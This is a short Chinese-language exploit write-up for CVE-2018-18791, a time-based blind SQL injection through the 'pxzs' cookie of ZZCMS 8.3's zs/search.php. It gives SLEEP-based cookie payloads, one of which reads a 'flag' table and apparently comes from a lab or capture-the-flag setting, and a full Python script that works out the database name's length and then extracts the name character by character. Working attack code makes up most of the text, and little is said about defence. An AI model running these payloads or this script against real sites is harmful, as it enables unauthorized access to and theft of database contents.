zzcms8.3注入 (CVE-2018-18791)
概述
站长招商网内容管理系统简称 ZZCMS,由ZZCMS团队开发,融入数据库优化,内容缓存,AJAX等技术,使网站的安全性 、稳定性 、负载能力得到可靠保障。源码开放,功能模块独立,便于二次开发。 zzcms8.3中zs/search.php中,Cookie的pxzs参数存在SQL注入漏洞
影响范围
POC
判断长度
GET /zs/search.php HTTP/1.1
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Cookie: pxzs=(SELECT(1)FROM(SELECT(SLEEP((3-length(database()))=1)))abcd)
pxzs=(SELECT(1)FROM(SELECT(SLEEP((103-(select conv(hex(mid((select flag from flag),1,1)),16,10)))=1)))abcd)
python3 POC
#/usr/local/bin/python3
# -*-coding:utf-8-*-
import requests
import time
def zs_sqli(host):
payloads = '-.@_abcdefghijklmnopqrstuvwxyz0123456789{}'
result = ""
headers = {"Host": host,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
}
cookies = {"bdshare_firstime":"", "PHPSESSID":"", "UserName":"", "PassWord":""}
url = "http://%s/zs/search.php" % host
#proxies = {"http":"http://127.0.0.1:8080"}
proxies = ""
rlen = 0
print("Start\n")
for i in range(1,100):
pxzs = "(SELECT(1)FROM(SELECT(SLEEP((%d-length(database()))=1)))abcd)" %i
cookies["pxzs"] = pxzs
starttime = time.time()
res = requests.get(url, headers=headers, cookies=cookies, proxies=proxies)
if time.time() - starttime > 1:
rlen = i - 1
print("the length of current database is : %d\n" %rlen)
break
for j in range(1, rlen+1):
for payload in payloads:
char = ord(payload) + 1
starttime = time.time()
pxzs = "(SELECT(1)FROM(SELECT(SLEEP((%d-(select conv(hex(mid(database(),%d,1)),16,10)))=1)))abcd)" %(char, j)
cookies["pxzs"] = pxzs
res = requests.get(url, headers=headers, cookies=cookies, proxies=proxies)
if time.time() - starttime > 1:
result += payload
print('current database is:', result)
break
else:
pass
print('\n[Finally] current database is %s' % result)
if __name__ == '__main__':
host = '172.18.1.1'
zs_sqli(host)